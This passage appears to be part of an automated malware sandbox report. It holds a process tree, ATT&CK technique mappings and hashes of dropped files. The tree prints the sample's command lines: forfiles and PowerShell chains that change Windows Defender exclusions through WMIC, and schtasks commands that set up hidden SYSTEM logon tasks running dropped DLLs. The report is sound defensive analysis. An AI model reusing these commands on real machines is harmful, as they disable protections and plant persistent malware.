                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                • Indirect Command Execution
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5388
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2044
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6696
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6512
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:428
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    schtasks /DELETE /F /TN "bAqRDoFVIdSJfWxTlj"
                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6900
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3336
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5680
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Indirect Command Execution
                                                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5408
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3968
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6640
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5508
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\BRWHUqYPU\MaIWsX.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "MHiaqjbnoCNpItK" /V1 /F
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:376
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        schtasks /CREATE /TN "MHiaqjbnoCNpItK2" /F /xml "C:\Program Files (x86)\BRWHUqYPU\PEWcdRC.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6276
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        schtasks /END /TN "MHiaqjbnoCNpItK"
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5148
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          schtasks /DELETE /F /TN "MHiaqjbnoCNpItK"
                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3640
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks /CREATE /TN "YQZkeEGXXGJdtu" /F /xml "C:\Program Files (x86)\GqgEBhsSxktU2\EahGxgz.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6336
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks /CREATE /TN "cosGrOuVCynQy2" /F /xml "C:\ProgramData\PdOICyyFbClqQxVB\opyoqKP.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5948
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks /CREATE /TN "PZmGxZPxdZZSPZWvU2" /F /xml "C:\Program Files (x86)\efiAzqQKrQpqActHLvR\FAomeJZ.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2012
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks /CREATE /TN "NzCzwfloobUmvfgYOrr2" /F /xml "C:\Program Files (x86)\OJMRwiGdhyaHC\bTWTPHB.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6140
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks /CREATE /TN "GaMnT1" /SC once /ST 01:06:33 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6448
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks /run /I /tn "GaMnT1"
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4268
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              schtasks /DELETE /F /TN "GaMnT1"
                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4404
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3640
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  schtasks /DELETE /F /TN "unWjgiOqmrJvCJdsa"
                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5576
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4548
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4548.0.1964516278\562105798" -parentBuildID 20221007134813 -prefsHandle 1584 -prefMapHandle 1576 -prefsLen 22040 -prefMapSize 234008 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2b03a35f-f654-4c06-bed8-488c9ff7adc1} 4548 "\\.\pipe\gecko-crash-server-pipe.4548" 1664 15fcaaf5a58 gpu
                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3016
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4548.1.1498487934\611504133" -parentBuildID 20221007134813 -prefsHandle 2036 -prefMapHandle 2032 -prefsLen 22121 -prefMapSize 234008 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {99324ec7-f3cc-4ffc-a214-c3aa6e840fa1} 4548 "\\.\pipe\gecko-crash-server-pipe.4548" 2052 15fca0d5858 socket
                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4436
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4548.2.1582596172\1436755529" -childID 1 -isForBrowser -prefsHandle 2580 -prefMapHandle 2584 -prefsLen 22224 -prefMapSize 234008 -jsInitHandle 1252 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1ec08b39-2e31-4ec5-863a-7697781302ad} 4548 "\\.\pipe\gecko-crash-server-pipe.4548" 2864 15fce5f3258 tab
                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5168
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4548.3.215469009\287034264" -childID 2 -isForBrowser -prefsHandle 3420 -prefMapHandle 3416 -prefsLen 27254 -prefMapSize 234008 -jsInitHandle 1252 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e95b678-00c9-4bbc-9b16-c6c1e60a3c57} 4548 "\\.\pipe\gecko-crash-server-pipe.4548" 3424 15fd07d6c58 tab
                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6564
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4548.4.1411159157\906319492" -childID 3 -isForBrowser -prefsHandle 3968 -prefMapHandle 3964 -prefsLen 27254 -prefMapSize 234008 -jsInitHandle 1252 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {01b13a8d-2631-4c2d-b224-bd6c75209bfa} 4548 "\\.\pipe\gecko-crash-server-pipe.4548" 3980 15fd13f0b58 tab
                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5188
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4548.5.1490820790\234074229" -childID 4 -isForBrowser -prefsHandle 4428 -prefMapHandle 4424 -prefsLen 27254 -prefMapSize 234008 -jsInitHandle 1252 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {607c7027-a944-437a-bfa5-d89f543e95b6} 4548 "\\.\pipe\gecko-crash-server-pipe.4548" 4440 15fd24ac858 tab
                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2192
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4548.6.517807695\1485482686" -childID 5 -isForBrowser -prefsHandle 4676 -prefMapHandle 4660 -prefsLen 27263 -prefMapSize 234008 -jsInitHandle 1252 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4918ddf0-4a80-441e-b0db-d425fa6825f0} 4548 "\\.\pipe\gecko-crash-server-pipe.4548" 2460 15fce6fc758 tab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3928
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3776
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6812
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\ProgramData\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6692

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Reconnaissance

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Resource Development

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Initial Access

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Command and Scripting Interpreter

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1059

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PowerShell

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1059.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1053.005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1547

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1547.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Event Triggered Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1546

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Netsh Helper DLL

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1546.007

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1053.005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1547

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1547.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Event Triggered Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1546

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Netsh Helper DLL

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1546.007

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1053.005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Indirect Command Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1202

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1112

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Subvert Trust Controls

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1553

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1553.004

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Credentials from Password Stores

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1555

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Credentials from Web Browsers

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1555.003

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Unsecured Credentials

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1552

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Credentials In Files

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1552.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Browser Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1217

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Process Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1057

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1012

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1082

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        System Location Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1614

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        System Language Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1614.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Lateral Movement

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Collection

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1102

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Exfiltration

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Impact

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                          153KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                          f301844c097e1ff48cb86d9383cbc3bc

                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                          37883a1a8b3448a6c7c1f460ba25ad3831914756

                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2780966a33f0523b86fa5d09ca52c18bcda127fc642e1fda74facffcee11ad93

                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                          6db220306f8bd34bd6cadb0cfe72d7b04490430d354410df7f1bb4eefe0396f7741bd0aa111f3a7e27a568f2afadc939449ccc46dfb969a68e7e733ecd4237a1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2.1MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                          c8019973b8ca09d7f65ae5f50f355392

                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                          dfea205580c5664b7889735a27e94e0f6eb1d11a

